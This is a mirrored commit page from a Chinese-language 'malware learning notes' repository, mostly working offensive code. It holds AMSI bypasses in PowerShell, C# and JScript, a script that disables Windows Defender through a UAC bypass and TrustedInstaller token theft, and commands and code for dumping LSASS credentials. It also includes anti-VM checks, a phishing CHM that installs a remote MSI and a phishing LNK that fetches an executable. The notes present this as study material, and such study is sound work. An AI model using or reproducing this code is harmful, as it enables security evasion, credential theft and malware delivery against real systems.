qwqdanchun
/
Malware-Note
mirror of https://github.com/qwqdanchun/Malware-Note.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

GitBook: [main] 92 pages modified

This commit is contained in:
287182701 2021-05-16 17:08:17 +00:00 committed by gitbook-bot
parent 0c70b8fedf
commit 2143326028
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
92 changed files with 3957 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
README.md
View File

@ -0,0 +1,11 @@
# 恶意软件学习笔记
2021年给自己挖一个新坑。
在这里整理自己学习恶意软件分析以来学到的东西,同时存放一些从各个地方看到的技巧。
希望在新的一年里,能够多多进步。
备注:
所有示例中均使用“qwqdanchun”作为可以随意起名的部分各负载地址均为”C:\Temp\qwqdanchun.\*”。

136
SUMMARY.md Normal file
View File

@ -0,0 +1,136 @@
# Table of contents
* [恶意软件学习笔记](README.md)
## 权限维持 <a id="persistence"></a>
* [服务](persistence/service/README.md)
* [新建服务](persistence/service/new-service.md)
* [修改服务](persistence/service/edit-service.md)
* [隐藏服务](persistence/service/hide-service.md)
* [劫持服务](persistence/service/hijack-service.md)
* [启动项](persistence/startup/README.md)
* [注册表](persistence/startup/registry.md)
* [文件夹](persistence/startup/folder.md)
* [用户账户](persistence/user/README.md)
* [新建用户](persistence/user/add-user.md)
* [隐藏用户](persistence/user/hide-user.md)
* [DLL劫持](persistence/dll-hijack/README.md)
* [劫持自启动程序](persistence/dll-hijack/hijack-autorun-programs.md)
* [劫持.NET程序](persistence/dll-hijack/hijack-.net-program.md)
* [COM劫持](persistence/com-hijack/README.md)
* [COM劫持](persistence/com-hijack/com-hijack.md)
* [映像劫持](persistence/image-file-execution-options/README.md)
* [映像劫持](persistence/image-file-execution-options/image-file-execution-options.md)
* [计划任务](persistence/schtasks/README.md)
* [新建任务](persistence/schtasks/add-schtasks.md)
* [WMI](persistence/wmi/README.md)
* [WMI事件](persistence/wmi/wmi-event.md)
* [Office](persistence/office/README.md)
* [VSTO](persistence/office/vsto.md)
* [WLL/XLL](persistence/office/wll-xll.md)
* [模板文件](persistence/office/macro-enabled-add-in-file.md)
* [COM劫持](persistence/office/com-hijack.md)
* [BITS Jobs](persistence/bits-jobs/README.md)
* [BITS](persistence/bits-jobs/bits.md)
* [Rootkit](persistence/rootkit/README.md)
* [Rootkit](persistence/rootkit/rootkit.md)
* [未分类](persistence/uncatelogued/README.md)
* [Windows Telemetry](persistence/uncatelogued/windows-telemetry.md)
* [替换文件](persistence/uncatelogued/replace-file.md)
* [AppInit\_DLLs注入](persistence/uncatelogued/appinit-dlls-inject.md)
* [粘滞键](persistence/uncatelogued/sethc.exe.md)
* [cmd启动劫持](persistence/uncatelogued/command-processor.md)
* [屏幕保护](persistence/uncatelogued/screen-save.md)
* [注册SSP DLL](persistence/uncatelogued/ssp-dll.md)
* [AddMonitor](persistence/uncatelogued/addmonitor.md)
* [滥用POWERSHELL配置文件](persistence/uncatelogued/powershell-profile.md)
* [W32Time](persistence/uncatelogued/w32time.md)
* [UWP](persistence/uncatelogued/uwp.md)
* [Waitfor](persistence/uncatelogued/waitfor.md)
* [Bios](persistence/uncatelogued/bios.md)
* [劫持更新程序](persistence/uncatelogued/hijack-update-program.md)
* [利用LAPS](persistence/uncatelogued/laps.md)
* [SDB文件](persistence/uncatelogued/sdb.md)
## 提权 <a id="privilege-escalation"></a>
* [UAC Bypass](privilege-escalation/untitled-4.md)
* [漏洞](privilege-escalation/bug.md)
* [错误配置](privilege-escalation/wrong-config.md)
## 横向移动 <a id="lateral-movement"></a>
* [WMI](lateral-movement/wmi.md)
* [RPC](lateral-movement/rpc.md)
* [DCOM](lateral-movement/dcom.md)
* [HASH](lateral-movement/hash.md)
* [Kerberos tickets](lateral-movement/kerberos-tickets.md)
## 文件结构 <a id="file"></a>
* [Office](file/office.md)
* [LNK](file/lnk/README.md)
* [钓鱼lnk](file/lnk/phishing-lnk.md)
* [PE](file/pe.md)
* [CHM](file/chm/README.md)
* [钓鱼chm](file/chm/phishing-chm.md)
## 注入 <a id="inject"></a>
* [注入](inject/inject.md)
## 反分析 <a id="anti-analysis"></a>
* [反虚拟机/沙盒](anti-analysis/anti-vm-sandbox.md)
## 获取用户密码或hash <a id="get-password"></a>
* [SMB](get-password/smb.md)
* [注入mstsc.exe](get-password/inject-mstsc.exe.md)
* [Mimikatz](get-password/mimikatz.md)
* [NPLogonNotify](get-password/nplogonnotify.md)
* [Tickets](get-password/tickets.md)
## 进程链 <a id="process"></a>
* [启动进程](process/creat-new-process.md)
## 关闭杀软 <a id="disable-av"></a>
* [关闭WD](disable-av/disable-wd.md)
## AMSI
* [绕过AMSI](amsi/bypass-amsi.md)
## Dump内存 <a id="dump"></a>
* [MiniDumpWriteDump](dump/untitled.md)
* [Shellcode](dump/shellcode.md)
* [SilentProcessExit](dump/silentprocessexit.md)
* [procdump](dump/procdump.md)
* [Task Manager/Process Explorer](dump/task-manager-process-explorer.md)
* [Sqldumper](dump/sqldumper.md)
* [comsvcs.dll](dump/comsvcs.dll.md)
* [WinPmem](dump/winpmem.md)
* [ProcessDump.exe](dump/processdump.exe.md)
* [Dumpert](dump/dumpert.md)
* [BSOD](dump/bsod.md)
* [PPLdump](dump/ppldump.md)
* [Hibernation](dump/hibernation.md)
## 木马分析 <a id="rats"></a>
* [Stealer](rats/stealer/README.md)
* [输入法](rats/stealer/shu-ru-fa.md)
* [Hidden Remote](rats/hidden-remote.md)
## 常用工具 <a id="tools"></a>
* [Untitled](tools/untitled.md)
## 鬼知道有什么用的小知识 <a id="tips"></a>
* [鬼知道有什么用的小知识](tips/some-tips.md)

85
amsi/bypass-amsi.md Normal file
View File

@ -0,0 +1,85 @@
# 绕过AMSI
Powershell:
```text
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
```
c\#:
```csharp
public class Amsi
{
public static void Bypass()
{
string x64 = "uFcA";
x64 = x64 + "B4DD";
string x86 = "uFcAB4";
x86 = x86 + "DCGAA=";
if (is64Bit())
PatchA(Convert.FromBase64String(x64));
else
PatchA(Convert.FromBase64String(x86));
}
private static void PatchA(byte[] patch)
{
try
{
string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
var lib = Win32.LoadLibraryA(ref liba);//Amsi.dll
string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer
uint oldProtect;
Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
Marshal.Copy(patch, 0, addr, patch.Length);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool is64Bit()
{
bool is64Bit = true;
if (IntPtr.Size == 4)
is64Bit = false;
return is64Bit;
}
}
class Win32
{
public static readonly DelegateVirtualProtect VirtualAllocEx = LoadApi<DelegateVirtualProtect>("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
#region CreateAPI
[DllImport("kernel32", SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
public static CreateApi LoadApi<CreateApi>(string name, string method)
{
return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
}
#endregion
}
```
js:
```javascript
var sh=new ActiveXObject('WScript.Shell');
var key="HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"
try{
var AmsiEnable=sh.RegRead(key);
if(AmsiEnable!=0) {
throw new Error(1'');
}
} catch(e) {
sh.RegWrite(key,0,"REG_DWORD");
sh.Run("cscript -e{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}"+WScript.ScriptFullName,0,1);
sh.RegWrite(key,1,"REG_DWORD");
WScript.Quit(1);
}
```

79
anti-analysis/anti-vm-sandbox.md Normal file
View File

@ -0,0 +1,79 @@
# 反虚拟机/沙盒
c\#\(WMI检测内存\):
```csharp
using System;
using System.Management;
using System.Threading;
namespace Program
{
class Anti_Analysis
{
public static void RunAntiAnalysis()
{
if (isVM())
{
Environment.FailFast(null);
}
Thread.Sleep(1000);
}
public static bool isVM()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
//SelectQuery selectQuery = new SelectQuery("Select * from CIM_Memory");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
i++;
return (i == 0);
}
}
}
```
c++\(即插即用设备\)
{% embed url="https://github.com/LordNoteworthy/al-khaser" caption="" %}
```cpp
#include <Windows.h>
#include <iostream>
#include <string>
int main()
{
DISPLAY_DEVICE dd;
dd.cb = sizeof(dd);
int deviceIndex = 0;
while (EnumDisplayDevices(0, deviceIndex, &dd, 0))
{
std::wstring deviceName = dd.DeviceName;
int monitorIndex = 0;
while (EnumDisplayDevices(deviceName.c_str(), monitorIndex, &dd, 0))
{
int flag = strlen((const char*)dd.DeviceString);
if (flag > 2) {
std::wcout << "this is vm";
}
else
{
std::wcout << "this is not vm";
}
++monitorIndex;
}
++deviceIndex;
}
return 0;
}
```
{% embed url="https://github.com/a0rtega/pafish" caption="" %}
测试工具:
{% embed url="https://github.com/LordNoteworthy/al-khaser" caption="" %}
{% embed url="https://github.com/a0rtega/pafish" caption="" %}

129
disable-av/disable-wd.md Normal file
View File

@ -0,0 +1,129 @@
# 关闭WD
```text
@(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16 || configure just auto-actions OFF; toggle icon on ltsb
set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}
## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2)
if ($env:1 -ne 6 -and $env:1 -ne 7) {
$choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51)
if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP}
}
## Without the dialog prompt above will toggle automatically
if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
## Comment to not relaunch systray icon
start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1
## Comment to not hide per-user toggle notifications
$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass?
$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition
## Cascade elevation
$u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
## Reload from volatile registry as needed
$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39
$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
$script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script
## 0: limited-user: must runas
if ($u -eq 0) {
start powershell -args $script -verb runas -win 1; break
}
## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas
if ($u -eq 1) {
if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
sp hkcu:\environment windir $('powershell '+$script+' #')
$z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
}
## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610]
if ($u -eq 2) {
$A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
$F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
$S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
$WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
$WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
$T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
$H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
$9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
}
## Create registry paths
$wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
## Toggle Defender
if ($env:1 -eq 7) {
rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
sc.exe config windefend depend= RpcSs
net1 start windefend
kill -Force -Name MpCmdRun -ea 0
start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
} else {
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
net1 stop windefend
sc.exe config windefend depend= RpcSs-TOGGLE
kill -Name MpCmdRun -Force -ea 0
start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0 ## Commented = keep scan history
del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
}
## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT
sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0 ## Auto Actions OFF
# rp $wdp DisableRoutinelyTakingAction -Force -ea 0 ## Auto Actions ON [default]
sp $wdp PUAProtection 1 -Type Dword -Force -ea 0 ## Potential Unwanted Apps ON
rp $wdp PUAProtection -Force -ea 0 ## Potential Unwanted Apps OFF [default]
sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0 ## Cloud blocking level HIGH
rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0 ## Cloud blocking level LOW [default]
sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0 ## Cloud protection ADVANCED
rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0 ## Cloud protection BASIC [default]
sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0 ## Sample Submission ALWAYS-PROMPT
rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0 ## Sample Submission AUTOMATIC [default]
sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0 ## Scan incoming file only
rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0 ## Scan incoming and outgoing file [default]
## Uncomment to close windows built-in lame uac bpass and/or reset uac
# if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
# $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe' ## %windir%\system32\cleanmgr.exe [default]
# $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null) ## UAC silent bpass mitigation
# $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
# sp $uac EnableLUA 1 -Type Dword -Force -ea 0 ## UAC enable
# sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0 ## UAC always notify - bpassable otherwise
# sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0 ## UAC secure - prevent automation
# }
'@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
#-_-# hybrid script, can be pasted directly into powershell console
```
来源:[https://pastebin.com/raw/hLsCCZQY](https://pastebin.com/raw/hLsCCZQY)

6
dump/bsod.md Normal file
View File

@ -0,0 +1,6 @@
# BSOD
参考链接:
{% embed url="https://www.mrwu.red/web/2000.html" caption="" %}

8
dump/comsvcs.dll.md Normal file
View File

@ -0,0 +1,8 @@
# comsvcs.dll
powershell:
```text
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <pid> C:\temp\lsass.dmp full
```

6
dump/dumpert.md Normal file
View File

@ -0,0 +1,6 @@
# Dumpert
参考链接:
{% embed url="https://github.com/outflanknl/Dumpert" caption="" %}

6
dump/hibernation.md Normal file
View File

@ -0,0 +1,6 @@
# Hibernation
参考链接:
{% embed url="https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps" caption="" %}

6
dump/ppldump.md Normal file
View File

@ -0,0 +1,6 @@
# PPLdump
参考链接:
{% embed url="https://github.com/itm4n/PPLdump" caption="" %}

10
dump/procdump.md Normal file
View File

@ -0,0 +1,10 @@
# procdump
```text
procdump -ma lsass.exe lsass.dmp
```
[http://live.sysinternals.com/procdump.exe](http://live.sysinternals.com/procdump.exe)
[http://live.sysinternals.com/procdump64.exe](http://live.sysinternals.com/procdump64.exe)

13
dump/processdump.exe.md Normal file
View File

@ -0,0 +1,13 @@
# ProcessDump.exe
## 来自Cisco Jabber
位于`c:\program files (x86)\cisco systems\cisco jabber\x64\`
powershell:
```text
cd c:\program files (x86)\cisco systems\cisco jabber\x64\
processdump.exe (ps lsass).id c:\temp\lsass.dmp
```

6
dump/shellcode.md Normal file
View File

@ -0,0 +1,6 @@
# Shellcode
参考链接:
{% embed url="https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/" caption="" %}

6
dump/silentprocessexit.md Normal file
View File

@ -0,0 +1,6 @@
# SilentProcessExit
参考链接:
{% embed url="https://github.com/deepinstinct/LsassSilentProcessExit" caption="" %}

17
dump/sqldumper.md Normal file
View File

@ -0,0 +1,17 @@
# Sqldumper
Microsoft SQL附带的调试实用程序。
位置:
* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
* C:\Program Files \(x86\)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
参考链接:
{% embed url="https://docs.microsoft.com/en-US/troubleshoot/sql/tools/use-sqldumper-generate-dump-file" caption="" %}
{% embed url="https://twitter.com/countuponsec/status/910969424215232518" caption="" %}
{% embed url="https://twitter.com/countuponsec/status/910977826853068800" caption="" %}

6
dump/task-manager-process-explorer.md Normal file
View File

@ -0,0 +1,6 @@
# Task Manager/Process Explorer
任务管理器中
右键-创建转储文件

180
dump/untitled.md Normal file
View File

@ -0,0 +1,180 @@
# MiniDumpWriteDump
c\#:
```csharp
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace MiniDumpWriteDump
{
class Program
{
[DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)]
static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle OutFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);
static void Main(string[] args)
{
try
{
Process[] process = Process.GetProcessesByName(args[0]);
Console.WriteLine("Get Processes Handle is " + process[0].Handle);
Console.WriteLine("Get Processes Id is " + process[0].Id);
using (FileStream fs = new FileStream("7kb.tmp", FileMode.Create, FileAccess.ReadWrite, FileShare.Write))
{
Console.WriteLine("Dump Status:" + MiniDumpWriteDump(process[0].Handle, (uint)process[0].Id, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero));
}
}
catch (Exception)
{
Console.WriteLine("MiniDumpWriteDump.exe lsass");
}
}
}
}
```
ps1
```text
function Out-Minidump
{
<#
.SYNOPSIS
Generates a full-memory minidump of a process.
PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-Minidump writes a process dump file with all process memory to disk.
This is similar to running procdump.exe with the '-ma' switch.
.PARAMETER Process
Specifies the process for which a dump will be generated. The process object
is obtained with Get-Process.
.PARAMETER DumpFilePath
Specifies the path where dump files will be written. By default, dump files
are written to the current working directory. Dump file names take following
form: processname_id.dmp
.EXAMPLE
Out-Minidump -Process (Get-Process -Id 4293)
Description
-----------
Generate a minidump for process ID 4293.
.EXAMPLE
Get-Process lsass | Out-Minidump
Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.
.EXAMPLE
Get-Process | Out-Minidump -DumpFilePath C:\temp
Description
-----------
Generate a minidump of all running processes and save them to C:\temp.
.INPUTS
System.Diagnostics.Process
You can pipe a process object to Out-Minidump.
.OUTPUTS
System.IO.FileInfo
.LINK
http://www.exploit-monday.com/
#>
[CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[System.Diagnostics.Process]
$Process,
[Parameter(Position = 1)]
[ValidateScript({ Test-Path $_ })]
[String]
$DumpFilePath = $PWD
)
BEGIN
{
$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
$Flags = [Reflection.BindingFlags] 'NonPublic, Static'
$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
}
PROCESS
{
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
$ProcessId,
$FileStream.SafeFileHandle,
$MiniDumpWithFullMemory,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
Get-ChildItem $ProcessDumpPath
}
}
END {}
}
```
参考链接:
{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" caption="" %}

6
dump/winpmem.md Normal file
View File

@ -0,0 +1,6 @@
# WinPmem
参考链接:
{% embed url="https://github.com/FSecureLABS/physmem2profit" caption="" %}

2
file/chm/README.md Normal file
View File

@ -0,0 +1,2 @@
# CHM

28
file/chm/phishing-chm.md Normal file
View File

@ -0,0 +1,28 @@
# 钓鱼chm
```markup
<HTML>
<script>
function test() {
qwqdanchun.Click();
}
window.setTimeout("test()", 128);
</script>
<head>
<title>New Item</title>
<META content="text/html; charset=UTF-8" http-equiv=Content-Type>
<META name=GENERATOR content="MSHTML 8.00.6001.18702"></HEAD>
<BODY dir=ltr bgColor=#ffffff>
<OBJECT id=qwqdanchun classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1 style="display:none">
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",conhost.exe, msiexec.exe /q /i http://127.0.0.1/Popup.msi">
</OBJECT>
</BODY>
</HTML>
```
推荐使用WinCHM制作msi文件自行打包制作注意不能选择管理员权限

8
file/lnk/README.md Normal file
View File

@ -0,0 +1,8 @@
# LNK
待整理
参考文章:
{% embed url="https://bbs.pediy.com/thread-260953.htm" caption="" %}

19
file/lnk/phishing-lnk.md Normal file
View File

@ -0,0 +1,19 @@
# 钓鱼lnk
```text
$shell = New-Object -ComObject WScript.Shell;
$desktop = [System.Environment]::GetFolderPath('Desktop');
$shortcut = $shell.CreateShortcut("$desktop\qwqdanchun.lnk");
$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
$shortcut.WindowStyle = 7;
$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B qwqdanchun*.exe | cmd.exe /k';
$shortcut.IconLocation = "https://127.0.0.1/qwqdanchun.exe?.ico";
$shortcut.Save();
```
利用icon缓存来下载文件并用conhost绕过杀软对进程链的判断。仅适用于win10win7等缓存目录不同有兴趣可以自行编写
参考文章:
{% embed url="https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/" caption="" %}

20
file/office.md Normal file
View File

@ -0,0 +1,20 @@
# Office
待整理
参考文章:
{% embed url="https://www.anquanke.com/post/id/175548" caption="" %}
{% embed url="https://docs.microsoft.com/zh-cn/deployoffice/compat/office-file-format-reference" caption="" %}
{% embed url="https://docs.microsoft.com/zh-cn/previous-versions/office/gg615407%28v=office.14%29" caption="" %}
{% embed url="https://github.com/dotnetcore/NPOI" caption="" %}
{% embed url="https://github.com/xceedsoftware/DocX" caption="" %}
{% embed url="https://github.com/Sicos1977/OfficeExtractor" caption="" %}
